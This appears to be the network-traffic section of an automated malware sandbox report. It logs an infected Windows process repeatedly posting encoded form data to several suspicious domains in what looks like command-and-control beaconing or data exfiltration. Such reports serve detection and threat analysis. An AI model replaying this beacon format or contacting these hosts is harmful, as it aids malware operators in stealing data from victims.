                  Data Ascii: ylT8el=8GvF4IHDkxfRShorYrOM7w13jTByJN3/o59NM+d1M6zoHoYBW3QghnPuNSe68r98cvWsHAX0n6JfOUHXI42uhN6WTLkvHvReMU4TnqNSqADEyrdfkK6Kfb+ADFfceQPYCiT1WMMmL8s6OvE2dRKnI8eN2F28BkDFYRHD7lH96g9anJ3GqR3kMySTZgXsSOGdRnsJmBTPB8agIIVomuYEtIE=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.11 | 49722 | 162.0.213.72 | 80 | 1164 | C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 10:51:20.319772959 CEST | 1702 | OUT | POST /f0fa/ HTTP/1.1
                  Host: www.hawalaz.xyz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.hawalaz.xyz
                  Content-Length: 1235
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.hawalaz.xyz/f0fa/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.11 | 49723 | 162.0.213.72 | 80 | 1164 | C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 10:51:22.986321926 CEST | 410 | OUT | GET /f0fa/?Qb94=7vWTifjxU&ylT8el=xEHl79bWtW6ubhQfSoH97y0Qn20SG8yk5613CYRnCuX+EaUdTnw5hRzhIFWMyf9Ue4jcKh73mqYqHXL3KYCSgMywK+MaAYZcUVEgz/x9qwHKwJpT4dGZYKc= HTTP/1.1
                  Host: www.hawalaz.xyz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.9
                  Connection: close
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Jul 3, 2024 10:51:28.760766983 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                  Date: Wed, 03 Jul 2024 08:51:23 GMT
                  Server: Apache
                  Content-Length: 16026
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.11 | 49724 | 162.209.189.210 | 80 | 1164 | C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 10:51:50.852684021 CEST | 663 | OUT | POST /qvp8/ HTTP/1.1
                  Host: www.66hc7.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.66hc7.com
                  Content-Length: 203
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.66hc7.com/qvp8/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Ascii: ylT8el=rrNPoY89sr8/XMx56t63c5YYu+fPXRoYiAqLuxmBZ9I0BSavpYNyitjluZwGs/D9OdT52ZNYRyjdPR5bqrp4x33/dIX8GlEWDgX5CNCMzH8X1hTUamRZe+kkDhIjfLYhtdCiQFwSxL1ri50/cXHteSvK+agBqSTzhpRgyM9n/IB8lxnAKu92oNR/itu44s7O9g==
Jul 3, 2024 10:51:51.365811110 CEST | 192 | IN | HTTP/1.1 200 OK
                  Content-Type: text/html
                  Content-Length: 96
                  Cache-Control: max-age=2592000
                  Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.11 | 49725 | 162.209.189.210 | 80 | 1164 | C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 10:51:53.386491060 CEST | 683 | OUT | POST /qvp8/ HTTP/1.1
                  Host: www.66hc7.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.66hc7.com
                  Content-Length: 223
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.66hc7.com/qvp8/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Ascii: ylT8el=rrNPoY89sr8/Xv559Ku3LJYHyufPZxoUiAmLu0fMMb40C3mvodxy3tjll5wDhfDMOdOZ2dNYRy3dPV1bq6p3xn35RoX+ZVEWDgX5CNmmzHkX1RDUZE5eQekrVRIjJLYltdD3QEt1xJ9ri9w/NmHuJivAjKhotTqJlJ4T/vtOrsxqg32aaN0hreZ92LPIxdeHmvH3/gycK75vSWQuUB+WP0g=
Jul 3, 2024 10:51:53.889050007 CEST | 192 | IN | HTTP/1.1 200 OK
                  Content-Type: text/html
                  Content-Length: 96
                  Cache-Control: max-age=2592000
                  Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.11 | 49726 | 162.209.189.210 | 80 | 1164 | C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 10:51:55.912646055 CEST | 1696 | OUT | POST /qvp8/ HTTP/1.1
                  Host: www.66hc7.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.66hc7.com
                  Content-Length: 1235
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.66hc7.com/qvp8/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Jul 3, 2024 10:51:56.438339949 CEST | 192 | IN | HTTP/1.1 200 OK
                  Content-Type: text/html
                  Content-Length: 96
                  Cache-Control: max-age=2592000
                  Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.11 | 49727 | 162.209.189.210 | 80 | 1164 | C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 10:51:58.444401979 CEST | 408 | OUT | GET /qvp8/?ylT8el=mplvrs1ArIkdV+pbxofmUrh9prbBWCkT+xqmpCLdJLMyBhuMsd9mhte1ppk8n/DSN9iY8LBVRzSodz5vy5F/ty/lBcXgfSQQVjq9BvSoxXo59QHAZm1IeeI=&Qb94=7vWTifjxU HTTP/1.1
                  Host: www.66hc7.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.9
                  Connection: close
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Jul 3, 2024 10:51:58.945667028 CEST | 192 | IN | HTTP/1.1 200 OK
                  Content-Type: text/html
                  Content-Length: 96
                  Cache-Control: max-age=2592000
                  Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.11 | 49728 | 198.16.50.172 | 80 | 1164 | C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 10:52:04.428543091 CEST | 678 | OUT | POST /450c/ HTTP/1.1
                  Host: www.zl1l5r.website
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.zl1l5r.website
                  Content-Length: 203
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.zl1l5r.website/450c/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Ascii: ylT8el=yYAa66qnKNZbRe6vjG2Gjjm+UY8QvCwsJX0qI0RZ8uA3sID0NxJw3YsmFMGXWaEVaHE09wyR9CZRKFZmnYa1oIrWASCHCbO5KzuXjt4Zhk7N713z7P1ie8tXkZrbuCUHaE2Bn2XICRKUdnIlA242jqXB1mRRvCB5u+nBTKuFpvCSoyS1wSZ5NTnnUKCgFvoLKQ==
Jul 3, 2024 10:52:05.063060045 CEST | 190 | IN | HTTP/1.1 400 Bad Request
                  Server: nginx
                  Date: Wed, 03 Jul 2024 08:52:04 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Ascii: d404 Not Found0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.11 | 49729 | 198.16.50.172 | 80 | 1164 | C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 10:52:06.961721897 CEST | 698 | OUT | POST /450c/ HTTP/1.1
                  Host: www.zl1l5r.website
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.zl1l5r.website
                  Content-Length: 223
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.zl1l5r.website/450c/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Ascii: ylT8el=yYAa66qnKNZbX9Svgn2GlDm9No8QliwoJXIqI29386s3vpz0DQJwwYsmPsGWb6EOaHI89xeR9CNRKEpmmqyypYrQMyCFP7O5KzuXjpY/hlTN4Fnz7tRhAMtUyprbqCUDaE3Un0zuCV6UdjMlAn4xqqXH52RAuAQ3ovahV8WmuNHvt0DvgxQuOAvlAsjQMeNCRXOjfXC8f2EAy59WC7tuKNI=
                  Jul 3, 2024 10:52:07.586397886 CEST | 190 | IN | HTTP/1.1 400 Bad Request
                  Server: nginx
                  Date: Wed, 03 Jul 2024 08:52:07 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Ascii: d404 Not Found0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  11 | 192.168.2.11 | 49730 | 198.16.50.172 | 80 | 1164 | C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 3, 2024 10:52:09.495687962 CEST | 1711 | OUT | POST /450c/ HTTP/1.1
                  Host: www.zl1l5r.website
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.zl1l5r.website
                  Content-Length: 1235
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.zl1l5r.website/450c/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Jul 3, 2024 10:52:10.833755016 CEST | 190 | IN | HTTP/1.1 400 Bad Request
                  Server: nginx
                  Date: Wed, 03 Jul 2024 08:52:10 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Ascii: d404 Not Found0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  12 | 192.168.2.11 | 49731 | 198.16.50.172 | 80 | 1164 | C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 3, 2024 10:52:12.038404942 CEST | 413 | OUT | GET /450c/?Qb94=7vWTifjxU&ylT8el=/ao65P+sOfMmbfuniX6EnBn+VadGjlZ4IHs7OXNxrL4MnIz0MXJ+3t4uCaWRdYsePUgUyRGsjSJtYkpLrLyO4a/zR2SZCsSjaR7P/IMYlkzk2RPJsuViTJY= HTTP/1.1
                  Host: www.zl1l5r.website
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.9
                  Connection: close
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Jul 3, 2024 10:52:12.781395912 CEST | 1236 | IN | HTTP/1.1 200 OK
                  Server: nginx
                  Date: Wed, 03 Jul 2024 08:52:12 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Vary: Accept-Encoding
                  Data Ascii: 7119<!DOCTYPE html><html xml:lang="zh-CN" lang="zh-CN"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1, viewport-fit=cover"> <meta name="renderer" content="webkit"> <meta name="force-rendering" content="webkit"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>-</title> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta property="og:type" content="index"> <meta property="og:title" content=" [TRUNCATED]


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  13 | 192.168.2.11 | 49732 | 3.33.130.190 | 80 | 1164 | C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 3, 2024 10:52:26.024961948 CEST | 690 | OUT | POST /f0bn/ HTTP/1.1
                  Host: www.marismotivates.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.marismotivates.com
                  Content-Length: 203
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.marismotivates.com/f0bn/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Ascii: ylT8el=xi7Kk/O+cNZIWwb2fpITYg7bblzje6gcIRMPXW4HzES4mROnHDlwz89Xpc4kp+BEh80Ofb4E/my9QnLmiZWvnW5gcYCaDXndG5p/BTg8MTIOkrmeeZjbqdJsK3U7Brn0tSxfVEJ37FkRzOlb5+Ew9KbFqrRcNsJSPfg/lWKsQH+9ZANvY9zQk3XbyJDGJTcctw==


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  14 | 192.168.2.11 | 49733 | 3.33.130.190 | 80 | 1164 | C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 3, 2024 10:52:28.571625948 CEST | 710 | OUT | POST /f0bn/ HTTP/1.1
                  Host: www.marismotivates.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.marismotivates.com
                  Content-Length: 223
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.marismotivates.com/f0bn/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Ascii: ylT8el=xi7Kk/O+cNZIWQr2cIITeA7cW1zjM6gQIRAPXX8Xz224m0qnEGZw089Xm85sneBxh85zfaEE/mm9QlDmiKOuom4GFICYJ3ndG5p/BSQSMTQOk4+eMK7Y1tJjdHU7LLnotSw6VG8q7HcRzLBb+vEv3KbDkLQzDsYoBs5HonyAW2GxRmc1Ie6HnkfZmvi2Ai5V24GIwl59WS6aLHUid9+hLBI=


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  15 | 192.168.2.11 | 49734 | 3.33.130.190 | 80 | 1164 | C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 3, 2024 10:52:31.108525991 CEST | 1723 | OUT | POST /f0bn/ HTTP/1.1
                  Host: www.marismotivates.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.marismotivates.com
                  Content-Length: 1235
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.marismotivates.com/f0bn/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Ascii: ylT8el=xi7Kk/O+cNZIWQr2cIITeA7cW1zjM6gQIRAPXX8Xz2+4mC2nGlxw189Xvc5tneBWh8R3faIy/gq9fn7m2rOuzW4GYYCbDXnIG557BTsSMTQOk5OePZjY3tJsK3UNBrnMtWkAVG5d70URzrRb8dsv0qbBl7QrDsUNBs0+on2qW2+xVT8vNvPcxVPm6vmOLgdYpum9wF0NBC2NDSxUYvCVQXqHHApFVZkWJ/swc/rqYlpPfac7mVBdkk6DnqWKEXV7m5S8F8woDIWV1CiYm890PINs6pIt32vG52uBqZ0Ppb73fBhlW07tEW6c7Mi8gMWftYxfcFHs2DLQFcw5c0RbpJdSONfIEoPu70qUngERk6l0WQrIhC5eAF8lPXmMpSnO/w7RcemKCCobMd05e8AtwkqYq+CL2zYRd2HK37DKhL0J3qtJDzD5BQiUXGARqzk42hOS5roXrP4nIEmVc5ZOj9dvrwYoWe8aw6jJPjbaklk5o+ZbiUdn9BIa2guPYmaMNRkSF6qXErmgPq4Wc8FDZ9GbBR15uR4jym8ND/BytZW6vXk1jdQmwblI8cws2N26N5XD1/h6I+1nR9Rxp2c/hHBYu9qhVJPtb5EoGTvjYjnmyf3AOWE/4OB5C7InYG/fetL4bw1vpKRxtBG+zbwWXO0XLe5nYHEDRjRbVKuDpa2f50tB0lwjIS1ThLOvLxqSsu/vnaP1Mp2WWOkJA55mSNmPKiZ+eEyuBUnByOh1HyDgDUB+uLlzskut/WU78+Ao9XKG2sBeGynAR/l5ZR6IDd3FciMfDRuvSyirq0EfUStsv34WPxFaG8Fp6tzzkCCZZ5WgOrq0qXkLte4VAUBpKaS1Y0KtglUUlGVVse582OU6y3gyzoqVUSTeaPWj54jRQZSnM3YorJ8hwxZ322MmSx6iEdghbiK4Xnw7E8KI4yj4DNwK+qCRse4iAAmtyKfdfYaA1MFiv/aRxxr7ki2Lh2Zu4Qqg2rtOQm91NJ20UmRpK [TRUNCATED]


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  16 | 192.168.2.11 | 49735 | 3.33.130.190 | 80 | 1164 | C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 3, 2024 10:52:33.652359962 CEST | 417 | OUT | GET /f0bn/?Qb94=7vWTifjxU&ylT8el=8gTqnLvKWah2bzreY4Z7YC6tcQCJVJlJXhg7Umglyi2zgynbPTp6zLopmb5gqsRo3dR1TaY9uWyFfEDO77D4zzlWEvz5BTf+ZLZnZGAxAhIiwZDsfI/I78A= HTTP/1.1
                  Host: www.marismotivates.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.9
                  Connection: close
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Jul 3, 2024 10:52:34.128894091 CEST | 397 | IN | HTTP/1.1 200 OK
                  Server: openresty
                  Date: Wed, 03 Jul 2024 08:52:34 GMT
                  Content-Type: text/html
                  Content-Length: 257
                  Connection: close
                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Qb94=7vWTifjxU&ylT8el=8gTqnLvKWah2bzreY4Z7YC6tcQCJVJlJXhg7Umglyi2zgynbPTp6zLopmb5gqsRo3dR1TaY9uWyFfEDO77D4zzlWEvz5BTf+ZLZnZGAxAhIiwZDsfI/I78A="}</script></head></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  17 | 192.168.2.11 | 49736 | 217.116.0.191 | 80 | 1164 | C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 3, 2024 10:52:48.365706921 CEST | 672 | OUT | POST /i4bw/ HTTP/1.1
                  Host: www.lecoinsa.net
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.lecoinsa.net
                  Content-Length: 203
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.lecoinsa.net/i4bw/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Ascii: ylT8el=MEaJXMXVJnVQdL4kvT8fwLNmnr+0/opHSuOziKaU0nqxscF/vCkpbDoa9JehzOx1PASLp5ddQtSpbxtTYacNOAPSMIgwGZV/EOKCC0piJeD3cv/9WZ22cJkQc8y+sD1rCcMCEwm/R6gV1SWDYXtHQlHrN9ms8BqYfmJW6W5SHArUz6yyhwz5QRta2o+l3NE8LA==
                  Jul 3, 2024 10:52:49.065510988 CEST | 572 | IN | HTTP/1.1 301 Moved Permanently
                  Server: openresty
                  Date: Wed, 03 Jul 2024 08:52:48 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Location: http://lecoinsa.net/i4bw/
                  Data Ascii: 15a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://lecoinsa.net/i4bw/'" /> <title>Redirecting to http://lecoinsa.net/i4bw/</title> </head> <body> Redirecting to <a href="http://lecoinsa.net/i4bw/">http://lecoinsa.net/i4bw/</a>. </body></html>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  18 | 192.168.2.11 | 49737 | 217.116.0.191 | 80 | 1164 | C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 3, 2024 10:52:51.500430107 CEST | 692 | OUT | POST /i4bw/ HTTP/1.1
                  Host: www.lecoinsa.net
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.lecoinsa.net
                  Content-Length: 223
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.lecoinsa.net/i4bw/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Ascii: ylT8el=MEaJXMXVJnVQcrIkt0ofn7NlsL+0lYpbSuKziOK+3RaxieN/uGQpWjoa1pe9uexuPAX8p8ldQtGpb0RTZsUKOQPQBogIJ5V/EOKCC0NYJeL3dfv9ZcapVpkXZMy+nj1vCcMgExLiR/sV1QeDfFFAblHtJ9nr9BnUan0h6X5IQAap28joxT6uTClYiOfV+8h1QHjBdDCz/OCFa6/3GEZhJ2k=
                  Jul 3, 2024 10:52:52.208338976 CEST | 572 | IN | HTTP/1.1 301 Moved Permanently
                  Server: openresty
                  Date: Wed, 03 Jul 2024 08:52:52 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Location: http://lecoinsa.net/i4bw/
                  Data Ascii: 15a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://lecoinsa.net/i4bw/'" /> <title>Redirecting to http://lecoinsa.net/i4bw/</title> </head> <body> Redirecting to <a href="http://lecoinsa.net/i4bw/">http://lecoinsa.net/i4bw/</a>. </body></html>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  19 | 192.168.2.11 | 49738 | 217.116.0.191 | 80 | 1164 | C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 3, 2024 10:52:54.053241968 CEST | 1705 | OUT | POST /i4bw/ HTTP/1.1
                  Host: www.lecoinsa.net
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.lecoinsa.net
                  Content-Length: 1235
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.lecoinsa.net/i4bw/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
